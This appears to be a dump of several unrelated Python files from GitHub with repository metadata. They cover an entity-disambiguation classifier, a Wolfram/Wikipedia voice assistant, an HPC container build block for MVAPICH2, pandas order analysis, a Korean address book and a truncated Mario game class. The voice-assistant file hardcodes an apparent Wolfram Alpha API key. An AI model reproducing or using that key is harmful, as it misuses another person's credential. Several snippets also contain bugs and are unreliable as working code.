[self.X_STORE, self.Y_STORE]:\n for key, X in STORE.iteritems():\n filepattern = FILE_PATTERN.format(key=key, version=\"*\")\n\n files = glob.glob(filepattern)\n version = len(files) + 1\n filepath = FILE_PATTERN.format(\n key=key,\n version=str(version),\n )\n\n with open(filepath, 'w') as f:\n # override previous pickle\n pickle.dump(X, f, -1)\n\n # Clear X and Y stores.\n self.X_STORE = {}\n self.Y_STORE = {}\n\n\nclass Classifier(object):\n\n graph = Graph()\n\n Y_STORE = {}\n\n entity_id_regexp = re.compile(r'^.+/([^>]+)>?$')\n entity_regexp = re.compile(r'^]+/[^<>]+)>?$')\n\n MAX_SAMPLES = 50000\n\n PROBABILITY_THRESHOLD = 0.0\n\n def __init__(self, epoch=0, alpha=0.1):\n self.epoch = epoch\n self.alpha = alpha # Weight of the sum of P(y|t), for t € T(e).\n\n def train(self):\n # Read ENTITIES.txt or TYPES.txt from stdin.\n l = 0\n for line in fileinput.input():\n l += 1\n\n # if l < 14912:\n # continue\n\n entity_id = self.entity_id_regexp.match(line).group(1)\n entity = self.entity_regexp.match(line).group(1)\n\n sys.stderr.write(\"%d - Handling %s\\n\" % (l, entity))\n\n # Get vector and matrix.\n Xall, yall = self.merge_files(entity_id, self.epoch)\n\n if not yall or len(yall) < 100:\n # Not enough data.\n sys.stderr.write(\"Ignoring %s (%d)\\n\" % (entity, len(yall)))\n continue\n\n sys.stderr.write(\"Length: %d\\n\" % len(yall))\n\n # Fit entity.\n self.classify(entity_id, Xall, yall, self.epoch)\n\n def merge_files(self, entity_id):\n \"\"\"\n Merge pickle files together to re-generate X and y.\n \"\"\"\n Xall = self.get_X(entity_id)\n yall = self.get_y(entity_id)\n\n return Xall, yall\n\n def balance_dataset(self, Xall, yall, key):\n \"\"\"\n Split the dataset in two parts and balance one of the part\n between valid and invalid elements.\n \"\"\"\n l = len(yall)\n\n # Select 2/3 of the indexes randomly.\n nb_samples = 2 * (l/3)\n sample = set(random.sample(xrange(l), nb_samples))\n\n # # store sampling.\n # k = SAMPLE_KEY % (key, self.epoch)\n # filepath = FILE_PATTERN.format(\n # key=k,\n # version=\"\", # Whatever\n # )\n # with open(filepath, 'w') as f:\n # pickle.dump(sample, f, -1)\n\n # Count the number of valid instances.\n valid_idx = []\n invalid_idx = []\n idx = -1\n for instance in yall:\n idx += 1\n if idx not in sample:\n continue\n if instance == 0:\n # invalid\n invalid_idx.append(idx)\n else:\n # valid\n valid_idx.append(idx)\n\n if len(valid_idx) == 0 or len(invalid_idx) == 0:\n sys.stderr.write(\"Only one class labels!\")\n return [], []\n\n s = set()\n ms = self.MAX_SAMPLES / 2\n if len(valid_idx) < len(invalid_idx):\n m = len(valid_idx) if len(valid_idx) <= ms else ms\n v = valid_idx\n if len(valid_idx) > ms:\n v = random.sample(valid_idx, m)\n li = random.sample(invalid_idx, m) + v\n s = set(li)\n else:\n m = len(invalid_idx) if len(invalid_idx) <= ms else ms\n v = invalid_idx\n if len(invalid_idx) > ms:\n v = random.sample(invalid_idx, m)\n li = random.sample(valid_idx, m) + v\n s = set(li)\n\n X, y = [], []\n idx = -1\n for instance in yall:\n idx += 1\n if idx not in sample:\n continue\n\n if idx in s:\n X.append(Xall[idx])\n y.append(yall[idx])\n return X, y\n\n def classify(self, entity_id, Xall, yall):\n # Balance the dataset.\n X, y = self.balance_dataset(Xall, yall, entity_id, self.epoch)\n\n if not y:\n return\n\n sys.stderr.write(\"After balancing: %d\\n\" % len(y))\n\n # Fit the classifier.\n clf = SGDClassifier(loss=\"log\", shuffle=True).fit(X, y)\n\n # Store the classifier.\n c_key = CLASSIFIER_KEY % (entity_id, self.epoch)\n c_file = FILE_PATTERN.format(key=c_key, version=\"\")\n with open(c_file, 'w') as f:\n pickle.dump(clf, f, -1)\n\n def assign(self, alias, f):\n \"\"\"\n Given an alias and a bag-of-words vector, assign an entity.\n Return the id bag-of-words the selected entity or None.\n \"\"\"\n # get entities\n entities = self.graph.get_entities(alias)\n\n if len(entities) == 1:\n # Naturally disambiguated alias.\n return entities[0], 1.0\n\n elif not entities:\n return None, .0\n\n # get all types\n all_types = self.graph.get_all_types(entities)\n\n probabilities = {}\n\n idx = -1\n for entity in entities:\n entity_id = entity.split('/')[-1]\n idx += 1\n\n clf = None\n c_key = CLASSIFIER_KEY % (entity_id, self.epoch)\n c_file = FILE_PATTERN.format(key=c_key, version=\"\")\n try:\n with open(c_file, 'r') as fi:\n clf = pickle.load(fi)\n except IOError:\n return None, .0\n\n p = 0\n if clf is not None:\n i = 0 if clf.classes_[0] == 1 else 1\n p = clf.predict_proba(f)[0][i]\n\n types = all_types[idx]\n for t in types:\n clf_t = None\n type_id = t.split('/')[-1]\n c_key = CLASSIFIER_KEY % (type_id, self.epoch)\n c_file = FILE_PATTERN.format(key=c_key, version=\"\")\n try:\n with open(c_file, 'r') as fi:\n clf_t = pickle.load(fi)\n except IOError:\n pass\n\n if clf_t is not None:\n i = 0 if clf_t.classes_[0] == 1 else 1\n p += self.alpha * clf_t.predict_proba(f)[0][i]\n\n probabilities[entity] = p\n\n # Assign entity!\n max_proba = 0\n selected_entity = None\n for k, v in probabilities.iteritems():\n if v > max_proba:\n max_proba = v\n selected_entity = k\n\n if max_proba > self.PROBABILITY_THRESHOLD:\n # if max_proba > 0:\n return selected_entity, max_proba\n else:\n return None, .0\n\n def assign_all(self):\n writer = csv.writer(sys.stdout)\n row_number = 0\n assignment_nb = 0\n #previous_alias = \"\"\n for row in csv.reader(sys.stdin):\n row_number += 1\n if row_number % 1000 == 0:\n sys.stderr.write(\"Row %d...\\n\" % row_number)\n\n if row_number < 780433:\n continue\n\n alias = format_alias(row[2])\n if not alias:\n continue\n x = []\n # Fill vector x.\n for i in xrange(COLUMNS):\n if i < 3:\n continue\n x.append(int(row[i]))\n\n # if alias != previous_alias:\n # # Save previous values to disk.\n # self.save_to_disk()\n # previous_alias = alias\n\n # Assign entity.\n entity, p = self.assign(alias, x)\n\n if entity:\n assignment_nb += 1\n sys.stderr.write(\"Assignment %d / %d (Proba: %f)\\n\" % (\n assignment_nb, row_number, p))\n writer.writerow([row[0], row[1], alias, entity, p])\n\n # # get entities\n # entities = self.graph.get_entities(alias)\n # # get all types\n # all_types = self.graph.get_all_types(entities)\n\n # if not entity:\n # self.update_unchanged(entities, all_types, row_number)\n # else:\n # self.update(entity, entities, all_types, row_number)\n\n def save_to_disk(self):\n # Save X and Y to disk.\n for key, y in self.Y_STORE.iteritems():\n filepattern = FILE_PATTERN.format(key=key, version=\"*\")\n\n files = glob.glob(filepattern)\n version = len(files) + 1\n filepath = FILE_PATTERN.format(\n key=key,\n version=str(version),\n )\n\n with open(filepath, 'w') as f:\n # override previous pickle\n pickle.dump(y, f, -1)\n\n # Clear store.\n self.Y_STORE = {}\n\n def get_X(self, entity_id):\n m_key = MATRIX_KEY % entity_id\n m_file = FILE_PATTERN.format(key=m_key, version=\"*\")\n X = []\n for fp in sorted(glob.glob(m_file)):\n # Put back all parts together.\n if len(X) >= self.MAX_SAMPLES:\n break\n with open(fp, 'r') as f:\n X += pickle.load(f)\n return X\n\n def get_y(self, entity_id):\n v_key = VECTOR_KEY % (entity_id, self.epoch)\n v_file = FILE_PATTERN.format(key=v_key, version=\"*\")\n y = []\n for fp in sorted(glob.glob(v_file)):\n # Put back all parts together.\n if len(y) >= self.MAX_SAMPLES:\n break\n with open(fp, 'r') as f:\n y += pickle.load(f)\n return y\n\n def update_unchanged(self, entities, all_types, row_number):\n idx = -1\n for entity in entities:\n idx += 1\n e_id = entity.split('/')[-1]\n\n y = self.get_y(e_id)\n\n self.Y_STORE[e_id] = y\n\n for t in all_types[idx]:\n type_id = t.split('/')[-1]\n y_t = self.get_y(e_id)\n self.Y_STORE[type_id] = y_t\n\n def update(self, entity_id, entities, all_types, row_number):\n idx = -1\n for entity in entities:\n idx += 1\n e_id = entity.split('/')[-1]\n\n y = self.get_y(e_id)\n\n v = 0\n if entity_id == e_id:\n v = 1\n\n y[row_number] = v\n\n self.Y_STORE[e_id] = y\n\n for t in all_types[idx]:\n type_id = t.split('/')[-1]\n y_t = self.get_y(e_id)\n y_t[row_number] = v\n self.Y_STORE[type_id] = y_t\n\n\ndef main():\n # Load data.\n #loader = Loader()\n #loader.load_data()\n\n # Classify.\n classifier = Classifier(epoch=6)\n #classifier.train()\n classifier.assign_all()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"srom/ensu","sub_path":"disambiguation/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":16562,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"73417786428","text":"import wolframalpha\nimport wikipedia\nimport PySimpleGUI as sg\nimport pyttsx3\nfrom win32com.client import Dispatch\n\nengine = pyttsx3.init()\nclient = wolframalpha.Client('HGYHP3-QXVAAJ3ATG')\nspeak = Dispatch(\"SAPI.SpVoice\")\n\nsg.theme('DarkBlue')\nlayout = [[sg.Text(\"What are you looking for? \"), sg.InputText()],[sg.Button('Search'), sg.Button('Cancel')]]\nwindow = sg.Window('Digital Assistant', layout)\nspeak.Speak(\"Hello, this is D-A,your digital assistant. What are you looking for? \")\n\nwhile True:\n\n event, values = window.read()\n\n if event in (None, 'Cancel'):\n speak.Speak(\"See you later\")\n break\n\n try:\n wiki_res = wikipedia.summary(values[0], sentences=2)\n wolfram_res = next(client.query(values[0]).results).text\n engine.say(wolfram_res)\n sg.PopupNonBlocking(\"Wolfram Result: \" + wolfram_res,\"Wikipedia Result: \" + wiki_res)\n\n except wikipedia.exceptions.DisambiguationError:\n wolfram_res = next(client.query(values[0]).results).text\n engine.say(wolfram_res)\n sg.PopupNonBlocking(wolfram_res)\n\n except wikipedia.exceptions.PageError:\n wolfram_res = next(client.query(values[0]).results).text\n engine.say(wolfram_res)\n sg.PopupNonBlocking(wolfram_res)\n\n except:\n wiki_res = wikipedia.summary(values[0], sentences=2)\n engine.say(wiki_res)\n sg.PopupNonBlocking(wiki_res)\n\n engine.runAndWait()\n\nwindow.close()\n","repo_name":"arnav-gupta-123/Virtual-Assistant","sub_path":"virtual_assistant.py","file_name":"virtual_assistant.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"30814037530","text":"from __future__ import absolute_import\nfrom __future__ import unicode_literals\nfrom __future__ import print_function\n\nimport logging # pylint: disable=unused-import\nimport posixpath\nimport re\nfrom copy import copy as _copy\n\nimport hpccm.config\nimport hpccm.templates.ConfigureMake\nimport hpccm.templates.envvars\nimport hpccm.templates.ldconfig\nimport hpccm.templates.rm\nimport hpccm.templates.sed\nimport hpccm.templates.tar\nimport hpccm.templates.wget\n\nfrom hpccm.building_blocks.base import bb_base\nfrom hpccm.building_blocks.packages import packages\nfrom hpccm.common import linux_distro\nfrom hpccm.primitives.comment import comment\nfrom hpccm.primitives.copy import copy\nfrom hpccm.primitives.environment import environment\nfrom hpccm.primitives.shell import shell\nfrom hpccm.toolchain import toolchain\n\nclass mvapich2(bb_base, hpccm.templates.ConfigureMake, hpccm.templates.envvars,\n hpccm.templates.ldconfig, hpccm.templates.rm,\n hpccm.templates.sed, hpccm.templates.tar, hpccm.templates.wget):\n \"\"\"The `mvapich2` building block configures, builds, and installs the\n [MVAPICH2](http://mvapich.cse.ohio-state.edu) component.\n Depending on the parameters, the source will be downloaded from\n the web (default) or copied from a source directory in the local\n build context.\n\n An InfiniBand building block ([OFED](#ofed) or [Mellanox\n OFED](#mlnx_ofed)) should be installed prior to this building\n block.\n\n As a side effect, a toolchain is created containing the MPI\n compiler wrappers. The tool can be passed to other operations\n that want to build using the MPI compiler wrappers.\n\n # Parameters\n\n check: Boolean flag to specify whether the `make check` step\n should be performed. The default is False.\n\n configure_opts: List of options to pass to `configure`. The\n default values are `--disable-mcast`.\n\n cuda: Boolean flag to control whether a CUDA aware build is\n performed. If True, adds `--enable-cuda --with-cuda` to the list\n of `configure` options, otherwise adds `--disable-cuda`. If the\n toolchain specifies `CUDA_HOME`, then that path is used, otherwise\n `/usr/local/cuda` is used for the path. The default value is\n True.\n\n directory: Path to the unpackaged source directory relative to\n the local build context. The default value is empty. If this is\n defined, the source in the local build context will be used rather\n than downloading the source from the web.\n\n environment: Boolean flag to specify whether the environment\n (`LD_LIBRARY_PATH` and `PATH`) should be modified to include\n MVAPICH2. The default is True.\n\n gpu_arch: The GPU architecture to use. Older versions of MVAPICH2\n (2.3b and previous) were hard-coded to use \"sm_20\". This option\n has no effect on more recent MVAPICH2 versions. The default value\n is to use the MVAPICH2 default.\n\n ldconfig: Boolean flag to specify whether the MVAPICH2 library\n directory should be added dynamic linker cache. If False, then\n `LD_LIBRARY_PATH` is modified to include the MVAPICH2 library\n directory. The default value is False.\n\n ospackages: List of OS packages to install prior to configuring\n and building. For Ubuntu, the default values are `byacc`, `file`,\n `make`, `openssh-client`, and `wget`. For RHEL-based Linux\n distributions, the default values are `byacc`, `file`, `make`,\n `openssh-clients`, and `wget`.\n\n prefix: The top level install location. The default value is\n `/usr/local/mvapich2`.\n\n toolchain: The toolchain object. This should be used if\n non-default compilers or other toolchain options are needed. The\n default is empty.\n\n version: The version of MVAPICH2 source to download. This value\n is ignored if `directory` is set. The default value is `2.3.1`.\n\n # Examples\n\n ```python\n mvapich2(cuda=False, prefix='/opt/mvapich2/2.3a', version='2.3a')\n ```\n\n ```python\n mvapich2(directory='sources/mvapich2-2.3b')\n ```\n\n ```python\n p = pgi(eula=True)\n mvapich2(toolchain=p.toolchain)\n ```\n\n ```python\n mvapich2(configure_opts=['--disable-fortran', '--disable-mcast'])\n ```\n \"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"Initialize building block\"\"\"\n\n super(mvapich2, self).__init__(**kwargs)\n\n self.__baseurl = kwargs.get('baseurl',\n 'http://mvapich.cse.ohio-state.edu/download/mvapich/mv2')\n self.__check = kwargs.get('check', False)\n self.configure_opts = kwargs.get('configure_opts', ['--disable-mcast'])\n self.cuda = kwargs.get('cuda', True)\n self.directory = kwargs.get('directory', '')\n self.__gpu_arch = kwargs.get('gpu_arch', None)\n self.__ospackages = kwargs.get('ospackages', [])\n self.prefix = kwargs.get('prefix', '/usr/local/mvapich2')\n self.__runtime_ospackages = [] # Filled in by __distro()\n\n # MVAPICH2 does not accept F90\n self.toolchain_control = {'CC': True, 'CXX': True, 'F77': True,\n 'F90': False, 'FC': True}\n self.version = kwargs.get('version', '2.3.1')\n\n self.__commands = [] # Filled in by __setup()\n\n # Input toolchain, i.e., what to use when building\n self.__toolchain = kwargs.get('toolchain', toolchain())\n self.__wd = '/var/tmp' # working directory\n\n # Output toolchain\n self.toolchain = toolchain(CC='mpicc', CXX='mpicxx', F77='mpif77',\n F90='mpif90', FC='mpifort')\n\n # Set the Linux distribution specific parameters\n self.__distro()\n\n # Construct the series of steps to execute\n self.__setup()\n\n # Fill in container instructions\n self.__instructions()\n\n def __instructions(self):\n \"\"\"Fill in container instructions\"\"\"\n\n if self.directory:\n self += comment('MVAPICH2')\n else:\n self += comment('MVAPICH2 version {}'.format(self.version))\n self += packages(ospackages=self.__ospackages)\n if self.directory:\n # Use source from local build context\n self += copy(src=self.directory,\n dest=posixpath.join(self.__wd, self.directory))\n self += shell(commands=self.__commands)\n self += environment(variables=self.environment_step())\n\n def __distro(self):\n \"\"\"Based on the Linux distribution, set values accordingly. A user\n specified value overrides any defaults.\"\"\"\n\n if hpccm.config.g_linux_distro == linux_distro.UBUNTU:\n if not self.__ospackages:\n self.__ospackages = ['byacc', 'file', 'make',\n 'openssh-client', 'wget']\n self.__runtime_ospackages = ['openssh-client']\n elif hpccm.config.g_linux_distro == linux_distro.CENTOS:\n if not self.__ospackages:\n self.__ospackages = ['byacc', 'file', 'make',\n 'openssh-clients', 'wget']\n self.__runtime_ospackages = ['openssh-clients']\n else: # pragma: no cover\n raise RuntimeError('Unknown Linux distribution')\n\n def __set_gpu_arch(self, directory=None):\n \"\"\"Older versions of MVAPICH2 (2.3b and previous) were hard-coded to\n use the \"sm_20\" GPU architecture. Use the specified value\n instead.\"\"\"\n\n if self.cuda and self.__gpu_arch and directory:\n self.__commands.append(\n self.sed_step(file=posixpath.join(directory, 'Makefile.in'),\n patterns=[r's/-arch sm_20/-arch {}/g'.format(self.__gpu_arch)]))\n\n def __setup(self):\n \"\"\"Construct the series of shell commands, i.e., fill in\n self.__commands\"\"\"\n\n # Create a copy of the toolchain so that it can be modified\n # without impacting the original.\n toolchain = _copy(self.__toolchain)\n\n tarball = 'mvapich2-{}.tar.gz'.format(self.version)\n url = '{0}/{1}'.format(self.__baseurl, tarball)\n\n # CUDA\n if self.cuda:\n cuda_home = \"/usr/local/cuda\"\n if toolchain.CUDA_HOME:\n cuda_home = toolchain.CUDA_HOME\n\n # The PGI compiler needs some special handling for CUDA.\n # http://mvapich.cse.ohio-state.edu/static/media/mvapich/mvapich2-2.0-userguide.html#x1-120004.5\n if toolchain.CC and re.match('.*pgcc', toolchain.CC):\n self.configure_opts.append(\n '--enable-cuda=basic --with-cuda={}'.format(cuda_home))\n\n # Work around issue when using PGI 19.4\n self.configure_opts.append('--enable-fast=O1')\n\n if not toolchain.CFLAGS:\n toolchain.CFLAGS = '-ta=tesla:nordc'\n\n if not toolchain.CPPFLAGS:\n toolchain.CPPFLAGS = '-D__x86_64 -D__align__\\(n\\)=__attribute__\\(\\(aligned\\(n\\)\\)\\) -D__location__\\(a\\)=__annotate__\\(a\\) -DCUDARTAPI='\n\n if not toolchain.LD_LIBRARY_PATH:\n toolchain.LD_LIBRARY_PATH = posixpath.join(\n cuda_home, 'lib64', 'stubs') + ':$LD_LIBRARY_PATH'\n else:\n if not toolchain.LD_LIBRARY_PATH:\n toolchain.LD_LIBRARY_PATH = posixpath.join(\n cuda_home, 'lib64', 'stubs') + ':$LD_LIBRARY_PATH'\n self.configure_opts.append(\n '--enable-cuda --with-cuda={}'.format(cuda_home))\n\n # Workaround for using compiler wrappers in the build stage\n self.__commands.append('ln -s {0} {1}'.format(\n posixpath.join(cuda_home, 'lib64', 'stubs', 'libnvidia-ml.so'),\n posixpath.join(cuda_home, 'lib64', 'stubs',\n 'libnvidia-ml.so.1')))\n self.__commands.append('ln -s {0} {1}'.format(\n posixpath.join(cuda_home, 'lib64', 'stubs', 'libcuda.so'),\n posixpath.join(cuda_home, 'lib64', 'stubs', 'libcuda.so.1')))\n\n else:\n self.configure_opts.append('--disable-cuda')\n\n if self.directory:\n # Use source from local build context\n self.__set_gpu_arch(\n directory=posixpath.join(self.__wd, self.directory))\n self.__commands.append(self.configure_step(\n directory=posixpath.join(self.__wd, self.directory),\n toolchain=toolchain))\n else:\n # Download source from web\n self.__commands.append(self.download_step(url=url,\n directory=self.__wd))\n self.__commands.append(self.untar_step(\n tarball=posixpath.join(self.__wd, tarball),\n directory=self.__wd))\n self.__set_gpu_arch(\n directory=posixpath.join(self.__wd,\n 'mvapich2-{}'.format(self.version)))\n\n self.__commands.append(self.configure_step(\n directory=posixpath.join(self.__wd,\n 'mvapich2-{}'.format(self.version)),\n toolchain=toolchain))\n\n\n self.__commands.append(self.build_step())\n\n if self.__check:\n self.__commands.append(self.check_step())\n\n self.__commands.append(self.install_step())\n\n # Set library path\n libpath = posixpath.join(self.prefix, 'lib')\n if self.ldconfig:\n self.__commands.append(self.ldcache_step(directory=libpath))\n else:\n self.environment_variables['LD_LIBRARY_PATH'] = '{}:$LD_LIBRARY_PATH'.format(libpath)\n\n if self.directory:\n # Using source from local build context, cleanup directory\n self.__commands.append(self.cleanup_step(\n items=[posixpath.join(self.__wd, self.directory)]))\n else:\n # Using downloaded source, cleanup tarball and directory\n self.__commands.append(self.cleanup_step(\n items=[posixpath.join(self.__wd, tarball),\n posixpath.join(self.__wd,\n 'mvapich2-{}'.format(self.version))]))\n\n # Setup environment variables\n self.environment_variables['PATH'] = '{}:$PATH'.format(\n posixpath.join(self.prefix, 'bin'))\n if self.cuda:\n # Workaround for using compiler wrappers in the build stage\n self.environment_variables['PROFILE_POSTLIB'] = '\"-L{} -lnvidia-ml -lcuda\"'.format('/usr/local/cuda/lib64/stubs')\n\n def runtime(self, _from='0'):\n \"\"\"Generate the set of instructions to install the runtime specific\n components from a build in a previous stage.\n\n # Examples\n\n ```python\n m = mvapich2(...)\n Stage0 += m\n Stage1 += m.runtime()\n ```\n \"\"\"\n instructions = []\n instructions.append(comment('MVAPICH2'))\n # TODO: move the definition of runtime ospackages\n instructions.append(packages(ospackages=self.__runtime_ospackages))\n instructions.append(copy(_from=_from, src=self.prefix,\n dest=self.prefix))\n if self.ldconfig:\n instructions.append(shell(\n commands=[self.ldcache_step(\n directory=posixpath.join(self.prefix, 'lib'))]))\n # No need to workaround compiler wrapper issue for the runtime.\n instructions.append(environment(\n variables=self.environment_step(exclude=['PROFILE_POSTLIB'])))\n return '\\n'.join(str(x) for x in instructions)\n","repo_name":"unholywhale/hpc-container-maker","sub_path":"hpccm/building_blocks/mvapich2.py","file_name":"mvapich2.py","file_ext":"py","file_size_in_byte":13670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"6"} +{"seq_id":"33280009022","text":"#%%\ntest = df_og[df_og['Billing Country'] == 'DE']\ntest.shape\n\n#%%\ntest = test.loc[:,['Name', 'Email', 'Financial Status', 'Created at', 'Currency', 'Subtotal', 'Shipping', 'Taxes', 'Total', 'Discount Code', 'Discount Amount', 'Lineitem name', 'Lineitem sku', 'Billing Name']]\n\n#%%\ntest.rename(columns={'Name':'Order_ID','Financial Status':'Status' ,'Created at':'Creation_Date', 'Lineitem name':'Product Name', 'Lineitem name':'Product_ID', 'Billing Name': 'Customer_Name'}, inplace=True)\n\n#%%\ntest['Creation_Date'] = pd.to_datetime(test['Creation_Date'], errors='coerce')\n\n#%%\n#test = test[~test['Status'].isin(['Cancelled'])]\n#test = test.fiilna(0)\n#%%\ntest.set_index('Order_ID', inplace=True)\n\n#%%\n#test.Customer_Name.isnull().sum()\ndf_og['Paid at'].isnull().sum()\n\n#%%\ntest['First_Order'] = test.groupby(level=0)['Creation_Date'].min()\ntest['First_Order_YM'] = test.groupby(level=0)['Creation_Date'].min().apply(lambda x: x.strftime('%Y-%m'))\n\n#%%\ntest.reset_index(inplace=True)\ntest['Creation_Date_YM'] = test['Creation_Date'].apply(lambda x: x.strftime('%Y-%m'))\nfirst_orders = test.sort_values('Creation_Date').groupby('Email')['Order_ID'].first().values\ntest['Customer_Type'] = np.where(test['Order_ID'].isin(first_orders),'New','Returning')\n\n#%%\ntest['Creation_Date'] = pd.to_datetime(test['Creation_Date'], errors='ignore', utc=True)\ntest['Year'] = test['Creation_Date'].dt.year\n\n\n#%%\ntest['Week'] = test['Creation_Date'].dt.isocalendar().week\ntest['Year_Week'] = test['Creation_Date'].dt.strftime(\"%Y-%W\")\n\n#%%\ntest = test.astype({'Subtotal':'float64', 'Shipping':'float64', 'Taxes':'float64', 'Total':'float64', 'Discount Amount':'float64'})\ntest['ValueNOVAT'] = test.Total - test.Taxes\ntest\n\n\n\n\n#%%\ntest = test[~test['Status'].isin(['Cancelled'])]\ntest.set_index('Order_ID', inplace=True)\ntest['First_Order'] = test.groupby(level=0)['Creation_Date'].min()\ntest['First_Order_YM'] = test.groupby(level=0)['Creation_Date'].min().apply(lambda x: x.strftime('%Y-%m'))\ntest.reset_index(inplace=True)\ntest['Creation_Date_YM'] = test['Creation_Date'].apply(lambda x: x.strftime('%Y-%m'))\nfirst_orders = test.sort_values('Creation_Date').groupby('E-mail')['Order'].first().values\ntest['Customer_Type'] = np.where(test['Order'].isin(first_orders),'New','Returning')\ntest['Payment_Type'] = np.where(test['Payment'] == 'Payment Amazon','Amazon','Webshop')\ntest['Year'] = test['Creation_Date'].dt.year\ntest['Week'] = test['Creation_Date'].dt.week\ntest['Year_Week'] = test['Creation_Date'].dt.strftime(\"%Y-%W\")\n","repo_name":"rahichan/angela_legacy","sub_path":"POM/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"86313835261","text":"import sys\n\n\npList = [\n {\"seq\":1, \"name\":\"HONG\", \"phone\":\"010-1111-1111\", \"addr\":\"서울시 강남구\"},\n {\"seq\":2, \"name\":\"KIM\", \"phone\":\"010-1111-2222\", \"addr\":\"대구시 수성구\"},\n {\"seq\":3, \"name\":\"LEE\", \"phone\":\"010-1111-3333\", \"addr\":\"부산시 사하구\"},\n {\"seq\":4, \"name\":\"PARK\", \"phone\":\"010-1111-4444\", \"addr\":\"광주시 송정동\"}\n]\n\nsequence = 5\n\ndef menu() :\n print(\"1.입력 2.출력 3.검색 4.수정 5.삭제 6.종료\")\n no = int(input(\"선택: \"))\n return no\n\n\ndef title() :\n print(\"-\"*50)\n print(\"{: ^50}\".format(\" 주소록 \"))\n print(\"-\"*50)\n\n\ndef search_list() :\n search_name = input(\"이름으로 검색 >>\")\n while len(search_name) == 0:\n print(\"검색어를 입력 하지 않았습니다.\")\n search_name = input(\"이름으로 검색 >>\")\n\n newList = []\n for p in pList:\n if p['name'] == search_name:\n newList.append(p)\n\n if len(newList) == 0:\n print(\"검색 결과 없습니다.\")\n return False\n\n print(\"{: <3}|{: ^10}|{: ^20}|{: ^30}\".format('no', 'NAME', 'PHONE', 'ADDRESS'))\n print(\"-\" * 60)\n for i, p in enumerate(newList):\n print(\"{: <3}|{: ^10}|{: ^20}|{: ^30}\".format(p['seq'], p['name'], p['phone'], p['addr']))\n\n # 검색 결과가 있을 경우 True 반환\n return True\n\ndef process() :\n global sequence\n\n title()\n\n while True :\n no = menu()\n print(f\"{no}번을 선택 했습니다.\")\n\n if no == 1 :\n print(\"=== 입력 기능 ===\")\n p = {\n \"seq\":sequence,\n \"name\": input(\"성명 입력>> \"),\n \"phone\": input(\"전화 번호 입력>> \"),\n \"addr\": input(\"주소 입력>> \")\n }\n pList.append(p)\n # 함수 외부 변수(global)는 전변수로 지정 해야 한다.\n # 함수 안에서 함수 외부의 변수를 수정 하기 위해 global 사용.\n sequence = sequence + 1\n elif no == 2 :\n print(\"=== 출력 기능 ===\")\n print(\"{: <3}|{: ^10}|{: ^20}|{: ^30}\".format('no', 'NAME', 'PHONE', 'ADDRESS'))\n print(\"-\" * 60)\n for i, p in enumerate(pList) :\n print(\"{: <3}|{: ^10}|{: ^20}|{: ^30}\".format(p['seq'],p['name'], p['phone'], p['addr']))\n elif no == 3 :\n print(\"=== 검색 기능 ===\")\n # 이름으로 검색 : LEE\n # pList의 요소 중 name이 LEE인 요소를 새 리스트에 저장.\n # 새 리스트 출력\n search_list()\n\n elif no == 4 :\n print(\"=== 수정 기능 ===\")\n if search_list() :\n modify_no = int(input(\"수정 할 no선택 >>\"))\n # modify_no로 seq가 같은 요소를 찾는다.\n # seq가 같은 요소의 내용을 새로 입력 받는다.\n for p in pList :\n if p[\"seq\"] == modify_no :\n p['name'] = input(\"새 이름 입력 >>\")\n p['phone'] = input(\"새 전화 입력 >>\")\n p['addr'] = input(\"새 주소 입력 >>\")\n print(\"수정 완료!\")\n\n elif no == 5 :\n print(\"=== 삭제 기능 ===\")\n if search_list() :\n modify_no = int(input(\"삭제 할 no선택 >>\"))\n # modify_no로 seq가 같은 요소를 찾는다.\n # seq가 같은 요소의 내용을 새로 입력 받는다.\n for p in pList :\n if p[\"seq\"] == modify_no :\n pList.remove(p)\n print(\"삭제 완료!\")\n break\n\n elif no == 6 :\n print(\"--- 프로그램 종료 ---\")\n print(\"다음에 만나요.\")\n sys.exit(0);\n break\n\n else :\n print(\"해당 사항 없습니다!\")\n\n print(\"\\n\")\n\n\nif __name__ == '__main__' :\n process()","repo_name":"seohyeongwon/pycharm","sub_path":"pycharm_work/pythonProject/ch05/ch05mini.py","file_name":"ch05mini.py","file_ext":"py","file_size_in_byte":4000,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"71552131388","text":"from pico2d import *\n\n\nclass Mario():\n def __init__(self):\n self.image = load_image('mario-side.png')\n self.flowerimage = load_image('mario-side-flower.png')\n self.star1 = load_image('mario-side-star1.png')\n self.star2 = load_image('mario-side-star2.png')\n self.star3 = load_image('mario-side-star3.png')\n self.star4 = load_image('mario-side-star4.png')\n self.star5 = load_image('mario-side-star5.png')\n self.star6 = load_image('mario-side-star6.png')\n \n self.x,self.y=100,100 #시작 좌표\n self.frame=0 #프레임 조절\n self.frame_size_x=27 #프레임 가로 길이 조절\n self.frame_empty_x=16 #이미지 앞에 빈공간 없애주기\n self.size_x=29 #이미지 가로 사이즈\n self.size_y=40 #이미지 세로 사이즈\n self.frame_y=2465 #이미지 세로 위치 조절\n #캐릭터의 움직임 속도\n self.move_x=0\n self.move_y=0\n # delay와 속도 조절\n self.frame_control=0\n self.frame_control_jump=0\n #현재 캐릭터의 움직임 속도\n self.speed=0\n self.dir=0\n #캐릭터 움직임\n self.jump=False\n self.after_jump=0\n self.run=0.05\n self.run_count=0\n #캐릭터 크기\n self.mario_size_x=44\n self.mario_size_y=60\n #충돌 타이머\n self.timer=0\n #마리오의 현재 상태\n self.state = 0 #0은바닥 1은 블럭위\n self.floor = 100 #바닥 좌표\n self.power = 0 #0 기본 상태,1 미니 상태, 2 꽃 먹은 상태,3 별 상태\n self.star_timer=0\n \n def draw(self):\n if self.x < 20:\n self.x = 20\n if self.x > 780:\n self.x = 780\n if self.timer > 0:\n self.timer-=100\n if self.timer%1000 != 0 and self.timer%500 != 0:\n self.image.clip_draw(self.frame * self.frame_size_x+self.frame_empty_x, self.frame_y, self.size_x, self.size_y, self.x, self.y,self.mario_size_x,self.mario_size_y)\n elif self.timer 